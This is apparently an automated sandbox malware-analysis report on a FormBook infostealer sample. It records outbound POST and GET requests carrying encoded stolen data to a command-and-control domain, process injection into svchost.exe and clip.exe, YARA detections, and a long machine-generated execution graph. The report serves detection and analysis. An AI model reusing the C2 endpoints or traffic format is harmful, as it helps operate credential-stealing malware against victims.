                    Data Ascii: YXDT=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDzQjmtm7POda4OwpoGQg3Ye/7/fzT2Z1AQ==


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.449777104.21.45.56802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:38.421303988 CEST791OUTPOST /lfkn/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.dmtxwuatbz.cc
                    Origin: http://www.dmtxwuatbz.cc
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 221
                    Referer: http://www.dmtxwuatbz.cc/lfkn/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 36 4d 6d 34 57 48 65 31 6b 38 62 54 64 68 77 31 6a 70 2b 74 6f 76 4c 7a 44 76 79 2b 6e 43 43 62 6b 3d
                    Data Ascii: YXDT=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY6Mm4WHe1k8bTdhw1jp+tovLzDvy+nCCbk=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.449778104.21.45.56802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:40.965296984 CEST10873OUTPOST /lfkn/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.dmtxwuatbz.cc
                    Origin: http://www.dmtxwuatbz.cc
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 10301
                    Referer: http://www.dmtxwuatbz.cc/lfkn/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 52 75 79 38 73 52 6c 7a 42 30 2f 4b 6d 76 6d 34 61 30 66 6d 45 36 58 45 56 48 2b 41 7a 76 68 65 49 57 44 78 7a 6b 33 4c 72 57 54 62 4a 75 77 70 38 33 5a 33 4e 4f 59 62 77 38 72 33 58 44 71 41 45 78 63 73 4e 6e 51 6d 55 76 59 72 47 39 39 53 47 6a 61 55 39 47 47 58 6e 34 65 4c 62 48 42 50 45 67 68 66 48 34 49 42 37 72 6b 61 78 57 33 6d 72 57 5a 57 69 2f 59 46 31 63 52 75 37 59 2f 62 4a 63 4a 68 79 46 62 54 5a 44 42 6e 2b 55 30 51 69 42 66 2f 52 76 62 58 61 75 34 50 4e 73 78 41 48 4a 54 [TRUNCATED]
                    Data Ascii: YXDT=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAORuy8sRlzB0/Kmvm4a0fmE6XEVH+AzvheIWDxzk3LrWTbJuwp83Z3NOYbw8r3XDqAExcsNnQmUvYrG99SGjaU9GGXn4eLbHBPEghfH4IB7rkaxW3mrWZWi/YF1cRu7Y/bJcJhyFbTZDBn+U0QiBf/RvbXau4PNsxAHJT0B4EMIa9ZfzW01DxfFzZ6r0RX4/5hH1St9W01BIjSe8bgTUd3nHUn+tuYmg/ucZcMybVRBp5KP/91y45L1OXuthnjqy9KKpZvrIyq7Ki2EORYo1CcwLn2tr6/pYFN/YwjTVmQ+aRuwyfFDZBSgbPfqZk80KIQxAkR8X02Q4aLGsWH2phSyydG6xPWhm+Zg64kVQwnupGX+q+qqPl+ThfD2QoL51miY/+57uidmWr8Qz/6e/WaozNJLbtZsHIArN7oxSsFUADytqgUGbC98qx5hYk7U2tNvkvG/cYzY53GRgrYM2sAGRB1IcgVqRoCAUqSlQKZvvsxOY9IqoJLUXfDEVPUsjrIgXvO3Piz70JWGdUmTUY2zj1qDR2ScpGfypKyhtqMf8Rx6uDFkSAMEDmZpy+/2VBX00JWjqic5fzxuAltDxhDfhrkwcKLl13ul5oWk4dqYk1bbGU8MYS3pGMU2RVucW6Q8D/RV0unDMzTUPCPJB/2+TSleJ+zgdcfk3utst5sWwAzT/bDbLvTmwawRUVjvxL+AaWkm5kpmCtwa+UWppQUGJwj/iibIPbj3WwaaMqkJiGay+ttLcx407CrZ90SfpvPIMoR1ImiA0ArbEbAgvKXIKCt9TVWIx4364ILTavhqsNMr4xpoEcMbcmVtnc1w5KfzHlr2 [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.449779104.21.45.56802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:43.509048939 CEST501OUTGET /lfkn/?YXDT=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&ZH3=yf1H3v6h HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.dmtxwuatbz.cc
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:23:12:57
                    Start date:11/08/2024
                    Path:C:\Users\user\Desktop\MV Sunshine, ORDER.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\MV Sunshine, ORDER.exe"
                    Imagebase:0x980000
                    File size:1'259'008 bytes
                    MD5 hash:FBC68C0B27F383EEB5177A01D2464B74
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:23:12:58
                    Start date:11/08/2024
                    Path:C:\Windows\SysWOW64\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\MV Sunshine, ORDER.exe"
                    Imagebase:0x970000
                    File size:46'504 bytes
                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:23:13:09
                    Start date:11/08/2024
                    Path:C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe"
                    Imagebase:0xce0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:3
                    Start time:23:13:11
                    Start date:11/08/2024
                    Path:C:\Windows\SysWOW64\clip.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\clip.exe"
                    Imagebase:0x440000
                    File size:24'576 bytes
                    MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:moderate
                    Has exited:false

                    Target ID:7
                    Start time:23:13:23
                    Start date:11/08/2024
                    Path:C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe"
                    Imagebase:0xce0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:8
                    Start time:23:13:36
                    Start date:11/08/2024
                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Imagebase:0x7ff6bf500000
                    File size:676'768 bytes
                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:3.7%
                      Dynamic/Decrypted Code Coverage:1.5%
                      Signature Coverage:5.2%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:183
                      execution_graph 98483 22223b0 98497 2220000 98483->98497 98485 222248e 98500 22222a0 98485->98500 98503 22234c0 GetPEB 98497->98503 98499 222068b 98499->98485 98501 22222a9 Sleep 98500->98501 98502 22222b7 98501->98502 98504 22234ea 98503->98504 98504->98499 98505 98107d 98510 9871eb 98505->98510 98507 98108c 98541 9a2f80 98507->98541 98511 9871fb __write_nolock 98510->98511 98544 9877c7 98511->98544 98515 9872ba 98556 9a074f 98515->98556 98522 9877c7 59 API calls 98523 9872eb 98522->98523 98575 987eec 98523->98575 98525 9872f4 RegOpenKeyExW 98526 9becda RegQueryValueExW 98525->98526 98530 987316 Mailbox 98525->98530 98527 9bed6c RegCloseKey 98526->98527 98528 9becf7 98526->98528 98527->98530 98540 9bed7e _wcscat Mailbox __NMSG_WRITE 98527->98540 98579 9a0ff6 98528->98579 98530->98507 98531 9bed10 98589 98538e 98531->98589 98534 9bed38 98592 987d2c 98534->98592 98535 987b52 59 API calls 98535->98540 98537 9bed52 98537->98527 98539 983f84 59 API calls 98539->98540 98540->98530 98540->98535 98540->98539 98601 987f41 98540->98601 98666 9a2e84 98541->98666 98543 981096 98545 9a0ff6 Mailbox 59 API calls 98544->98545 98546 9877e8 98545->98546 98547 9a0ff6 Mailbox 59 API calls 98546->98547 98548 9872b1 98547->98548 98549 984864 98548->98549 98605 9b1b90 98549->98605 98552 987f41 59 API calls 98553 984897 98552->98553 98607 9848ae 98553->98607 98555 9848a1 Mailbox 98555->98515 98557 9b1b90 __write_nolock 98556->98557 98558 9a075c GetFullPathNameW 98557->98558 98559 9a077e 98558->98559 98560 987d2c 59 API calls 98559->98560 98561 9872c5 98560->98561 98562 987e0b 98561->98562 98563 987e1f 98562->98563 98564 9bf173 98562->98564 98629 987db0 98563->98629 98634 988189 98564->98634 98567 9872d3 98569 983f84 98567->98569 98568 9bf17e __NMSG_WRITE _memmove 98570 983f92 98569->98570 98574 983fb4 _memmove 98569->98574 98572 9a0ff6 Mailbox 59 API calls 98570->98572 98571 9a0ff6 Mailbox 59 API calls 98573 983fc8 98571->98573 98572->98574 98573->98522 98574->98571 98576 987ef9 98575->98576 98577 987f06 98575->98577 98576->98525 98578 9a0ff6 Mailbox 59 API calls 98577->98578 98578->98576 98582 9a0ffe 98579->98582 98581 9a1018 98581->98531 98582->98581 98584 9a101c std::exception::exception 98582->98584 98637 9a594c 98582->98637 98654 9a35e1 DecodePointer 98582->98654 98655 9a87db RaiseException 98584->98655 98586 9a1046 98656 9a8711 58 API calls _free 98586->98656 98588 9a1058 98588->98531 98590 9a0ff6 Mailbox 59 API calls 98589->98590 98591 9853a0 RegQueryValueExW 98590->98591 98591->98534 98591->98537 98593 987d38 __NMSG_WRITE 98592->98593 98594 987da5 98592->98594 98596 987d4e 98593->98596 98597 987d73 98593->98597 98595 987e8c 59 API calls 98594->98595 98600 987d56 _memmove 98595->98600 98665 988087 59 API calls Mailbox 98596->98665 98599 988189 59 API calls 98597->98599 98599->98600 98600->98537 98602 987f50 __NMSG_WRITE _memmove 98601->98602 98603 9a0ff6 Mailbox 59 API calls 98602->98603 98604 987f8e 98603->98604 98604->98540 98606 984871 GetModuleFileNameW 98605->98606 98606->98552 98608 9b1b90 __write_nolock 98607->98608 98609 9848bb GetFullPathNameW 98608->98609 98610 9848da 98609->98610 98611 9848f7 98609->98611 98613 987d2c 59 API calls 98610->98613 98612 987eec 59 API calls 98611->98612 98614 9848e6 98612->98614 98613->98614 98617 987886 98614->98617 98618 987894 98617->98618 98621 987e8c 98618->98621 98620 9848f2 98620->98555 98622 987e9a 98621->98622 98624 987ea3 _memmove 98621->98624 98622->98624 98625 987faf 98622->98625 98624->98620 98626 987fc2 98625->98626 98628 987fbf _memmove 98625->98628 98627 9a0ff6 Mailbox 59 API calls 98626->98627 98627->98628 98628->98624 98630 987dbf __NMSG_WRITE 98629->98630 98631 988189 59 API calls 98630->98631 98632 987dd0 _memmove 98630->98632 98633 9bf130 _memmove 98631->98633 98632->98567 98635 9a0ff6 Mailbox 59 API calls 98634->98635 98636 988193 98635->98636 98636->98568 98638 9a59c7 98637->98638 98641 9a5958 98637->98641 98663 9a35e1 DecodePointer 98638->98663 98640 9a59cd 98664 9a8d68 58 API calls __getptd_noexit 98640->98664 98644 9a598b RtlAllocateHeap 98641->98644 98647 9a5963 98641->98647 98648 9a59b3 98641->98648 98652 9a59b1 98641->98652 98660 9a35e1 DecodePointer 98641->98660 98644->98641 98645 9a59bf 98644->98645 98645->98582 98647->98641 98657 9aa3ab 58 API calls __NMSG_WRITE 98647->98657 98658 9aa408 58 API calls 5 library calls 98647->98658 98659 9a32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98647->98659 98661 9a8d68 58 API calls __getptd_noexit 98648->98661 98662 9a8d68 58 API calls __getptd_noexit 98652->98662 98654->98582 98655->98586 98656->98588 98657->98647 98658->98647 98660->98641 98661->98652 98662->98645 98663->98640 98664->98645 98665->98600 98667 9a2e90 __wfsopen 98666->98667 98674 9a3457 98667->98674 98673 9a2eb7 __wfsopen 98673->98543 98691 9a9e4b 98674->98691 98676 9a2e99 98677 9a2ec8 DecodePointer DecodePointer 98676->98677 98678 9a2ea5 98677->98678 98679 9a2ef5 98677->98679 98688 9a2ec2 98678->98688 98679->98678 98737 9a89e4 59 API calls 2 library calls 98679->98737 98681 9a2f58 EncodePointer EncodePointer 98681->98678 98682 9a2f07 98682->98681 98683 9a2f2c 98682->98683 98738 9a8aa4 61 API calls 2 library calls 98682->98738 98683->98678 98686 9a2f46 EncodePointer 98683->98686 98739 9a8aa4 61 API calls 2 library calls 98683->98739 98686->98681 98687 9a2f40 98687->98678 98687->98686 98740 9a3460 98688->98740 98692 9a9e6f EnterCriticalSection 98691->98692 98693 9a9e5c 98691->98693 98692->98676 98698 9a9ed3 98693->98698 98695 9a9e62 98695->98692 98722 9a32f5 58 API calls 3 library calls 98695->98722 98699 9a9edf __wfsopen 98698->98699 98700 9a9ee8 98699->98700 98701 9a9f00 98699->98701 98723 9aa3ab 58 API calls __NMSG_WRITE 98700->98723 98710 9a9f21 __wfsopen 98701->98710 98726 9a8a5d 58 API calls 2 library calls 98701->98726 98703 9a9eed 98724 9aa408 58 API calls 5 library calls 98703->98724 98706 9a9f15 98708 9a9f2b 98706->98708 98709 9a9f1c 98706->98709 98707 9a9ef4 98725 9a32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98707->98725 98711 9a9e4b __lock 58 API calls 98708->98711 98727 9a8d68 58 API calls __getptd_noexit 98709->98727 98710->98695 98714 9a9f32 98711->98714 98716 9a9f3f 98714->98716 98717 9a9f57 98714->98717 98728 9aa06b InitializeCriticalSectionAndSpinCount 98716->98728 98729 9a2f95 98717->98729 98720 9a9f4b 98735 9a9f73 LeaveCriticalSection _doexit 98720->98735 98723->98703 98724->98707 98726->98706 98727->98710 98728->98720 98730 9a2fc7 _free 98729->98730 98731 9a2f9e RtlFreeHeap 98729->98731 98730->98720 98731->98730 98732 9a2fb3 98731->98732 98736 9a8d68 58 API calls __getptd_noexit 98732->98736 98734 9a2fb9 GetLastError 98734->98730 98735->98710 98736->98734 98737->98682 98738->98683 98739->98687 98743 9a9fb5 LeaveCriticalSection 98740->98743 98742 9a2ec7 98742->98673 98743->98742 98744 9a7e93 98745 9a7e9f __wfsopen 98744->98745 98781 9aa048 GetStartupInfoW 98745->98781 98748 9a7ea4 98783 9a8dbc GetProcessHeap 98748->98783 98749 9a7efc 98750 9a7f07 98749->98750 98866 9a7fe3 58 API calls 3 library calls 98749->98866 98784 9a9d26 98750->98784 98753 9a7f0d 98754 9a7f18 __RTC_Initialize 98753->98754 98867 9a7fe3 58 API calls 3 library calls 98753->98867 98805 9ad812 98754->98805 98757 9a7f27 98758 9a7f33 GetCommandLineW 98757->98758 98868 9a7fe3 58 API calls 3 library calls 98757->98868 98824 9b5173 GetEnvironmentStringsW 98758->98824 98761 9a7f32 98761->98758 98764 9a7f4d 98765 9a7f58 98764->98765 98869 9a32f5 58 API calls 3 library calls 98764->98869 98834 9b4fa8 98765->98834 98768 9a7f5e 98769 9a7f69 98768->98769 98870 9a32f5 58 API calls 3 library calls 98768->98870 98848 9a332f 98769->98848 98772 9a7f71 98773 9a7f7c __wwincmdln 98772->98773 98871 9a32f5 58 API calls 3 library calls 98772->98871 98854 98492e 98773->98854 98776 9a7f90 98777 9a7f9f 98776->98777 98872 9a3598 58 API calls _doexit 98776->98872 98873 9a3320 58 API calls _doexit 98777->98873 98780 9a7fa4 __wfsopen 98782 9aa05e 98781->98782 98782->98748 98783->98749 98874 9a33c7 36 API calls 2 library calls 98784->98874 98786 9a9d2b 98875 9a9f7c InitializeCriticalSectionAndSpinCount __mtinitlocks 98786->98875 98788 9a9d30 98789 9a9d34 98788->98789 98877 9a9fca TlsAlloc 98788->98877 98876 9a9d9c 61 API calls 2 library calls 98789->98876 98792 9a9d39 98792->98753 98793 9a9d46 98793->98789 98794 9a9d51 98793->98794 98878 9a8a15 98794->98878 98797 9a9d93 98886 9a9d9c 61 API calls 2 library calls 98797->98886 98800 9a9d72 98800->98797 98802 9a9d78 98800->98802 98801 9a9d98 98801->98753 98885 9a9c73 58 API calls 4 library calls 98802->98885 98804 9a9d80 GetCurrentThreadId 98804->98753 98806 9ad81e __wfsopen 98805->98806 98807 9a9e4b __lock 58 API calls 98806->98807 98808 9ad825 98807->98808 98809 9a8a15 __calloc_crt 58 API calls 98808->98809 98810 9ad836 98809->98810 98811 9ad8a1 GetStartupInfoW 98810->98811 98812 9ad841 __wfsopen @_EH4_CallFilterFunc@8 98810->98812 98818 9ad8b6 98811->98818 98821 9ad9e5 98811->98821 98812->98757 98813 9adaad 98900 9adabd LeaveCriticalSection _doexit 98813->98900 98815 9a8a15 __calloc_crt 58 API calls 98815->98818 98816 9ada32 GetStdHandle 98816->98821 98817 9ada45 GetFileType 98817->98821 98818->98815 98820 9ad904 98818->98820 98818->98821 98819 9ad938 GetFileType 98819->98820 98820->98819 98820->98821 98898 9aa06b InitializeCriticalSectionAndSpinCount 98820->98898 98821->98813 98821->98816 98821->98817 98899 9aa06b InitializeCriticalSectionAndSpinCount 98821->98899 98825 9a7f43 98824->98825 98826 9b5184 98824->98826 98830 9b4d6b GetModuleFileNameW 98825->98830 98901 9a8a5d 58 API calls 2 library calls 98826->98901 98828 9b51aa _memmove 98829 9b51c0 FreeEnvironmentStringsW 98828->98829 98829->98825 98831 9b4d9f _wparse_cmdline 98830->98831 98833 9b4ddf _wparse_cmdline 98831->98833 98902 9a8a5d 58 API calls 2 library calls 98831->98902 98833->98764 98835 9b4fb9 98834->98835 98836 9b4fc1 __NMSG_WRITE 98834->98836 98835->98768 98837 9a8a15 __calloc_crt 58 API calls 98836->98837 98841 9b4fea __NMSG_WRITE 98837->98841 98838 9b5041 98839 9a2f95 _free 58 API calls 98838->98839 98839->98835 98840 9a8a15 __calloc_crt 58 API calls 98840->98841 98841->98835 98841->98838 98841->98840 98842 9b5066 98841->98842 98845 9b507d 98841->98845 98903 9b4857 58 API calls 2 library calls 98841->98903 98843 9a2f95 _free 58 API calls 98842->98843 98843->98835 98904 9a9006 IsProcessorFeaturePresent 98845->98904 98847 9b5089 98847->98768 98850 9a333b __IsNonwritableInCurrentImage 98848->98850 98927 9aa711 98850->98927 98851 9a3359 __initterm_e 98852 9a2f80 __cinit 67 API calls 98851->98852 98853 9a3378 _doexit __IsNonwritableInCurrentImage 98851->98853 98852->98853 98853->98772 98855 984948 98854->98855 98865 9849e7 98854->98865 98856 984982 IsThemeActive 98855->98856 98930 9a35ac 98856->98930 98860 9849ae 98942 984a5b SystemParametersInfoW SystemParametersInfoW 98860->98942 98862 9849ba 98943 983b4c 98862->98943 98864 9849c2 SystemParametersInfoW 98864->98865 98865->98776 98866->98750 98867->98754 98868->98761 98872->98777 98873->98780 98874->98786 98875->98788 98876->98792 98877->98793 98880 9a8a1c 98878->98880 98881 9a8a57 98880->98881 98883 9a8a3a 98880->98883 98887 9b5446 98880->98887 98881->98797 98884 9aa026 TlsSetValue 98881->98884 98883->98880 98883->98881 98895 9aa372 Sleep 98883->98895 98884->98800 98885->98804 98886->98801 98888 9b5451 98887->98888 98893 9b546c 98887->98893 98889 9b545d 98888->98889 98888->98893 98896 9a8d68 58 API calls __getptd_noexit 98889->98896 98891 9b547c RtlAllocateHeap 98892 9b5462 98891->98892 98891->98893 98892->98880 98893->98891 98893->98892 98897 9a35e1 DecodePointer 98893->98897 98895->98883 98896->98892 98897->98893 98898->98820 98899->98821 98900->98812 98901->98828 98902->98833 98903->98841 98905 9a9011 98904->98905 98910 9a8e99 98905->98910 98909 9a902c 98909->98847 98911 9a8eb3 _memset ___raise_securityfailure 98910->98911 98912 9a8ed3 IsDebuggerPresent 98911->98912 98918 9aa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98912->98918 98914 9a8f97 ___raise_securityfailure 98919 9ac836 98914->98919 98916 9a8fba 98917 9aa380 GetCurrentProcess TerminateProcess 98916->98917 98917->98909 98918->98914 98920 9ac83e 98919->98920 98921 9ac840 IsProcessorFeaturePresent 98919->98921 98920->98916 98923 9b5b5a 98921->98923 98926 9b5b09 5 API calls ___raise_securityfailure 98923->98926 98925 9b5c3d 98925->98916 98926->98925 98928 9aa714 EncodePointer 98927->98928 98928->98928 98929 9aa72e 98928->98929 98929->98851 98931 9a9e4b __lock 58 API calls 98930->98931 98932 9a35b7 DecodePointer EncodePointer 98931->98932 98995 9a9fb5 LeaveCriticalSection 98932->98995 98934 9849a7 98935 9a3614 98934->98935 98936 9a3638 98935->98936 98937 9a361e 98935->98937 98936->98860 98937->98936 98996 9a8d68 58 API calls __getptd_noexit 98937->98996 98939 9a3628 98997 9a8ff6 9 API calls __wcsicmp_l 98939->98997 98941 9a3633 98941->98860 98942->98862 98944 983b59 __write_nolock 98943->98944 98945 9877c7 59 API calls 98944->98945 98946 983b63 GetCurrentDirectoryW 98945->98946 98998 983778 98946->98998 98948 983b8c IsDebuggerPresent 98949 983b9a 98948->98949 98950 9bd4ad MessageBoxA 98948->98950 98952 9bd4c7 98949->98952 98953 983bb7 98949->98953 98982 983c73 98949->98982 98950->98952 98951 983c7a SetCurrentDirectoryW 98954 983c87 Mailbox 98951->98954 99208 987373 59 API calls Mailbox 98952->99208 99079 9873e5 98953->99079 98954->98864 98957 9bd4d7 98962 9bd4ed SetCurrentDirectoryW 98957->98962 98959 983bd5 GetFullPathNameW 98960 987d2c 59 API calls 98959->98960 98961 983c10 98960->98961 99095 990a8d 98961->99095 98962->98954 98965 983c2e 98966 983c38 98965->98966 99209 9e4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98965->99209 99111 983a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98966->99111 98969 9bd50a 98969->98966 98972 9bd51b 98969->98972 98974 984864 61 API calls 98972->98974 98973 983c42 98975 983c55 98973->98975 99119 9843db 98973->99119 98976 9bd523 98974->98976 99130 990b30 98975->99130 98979 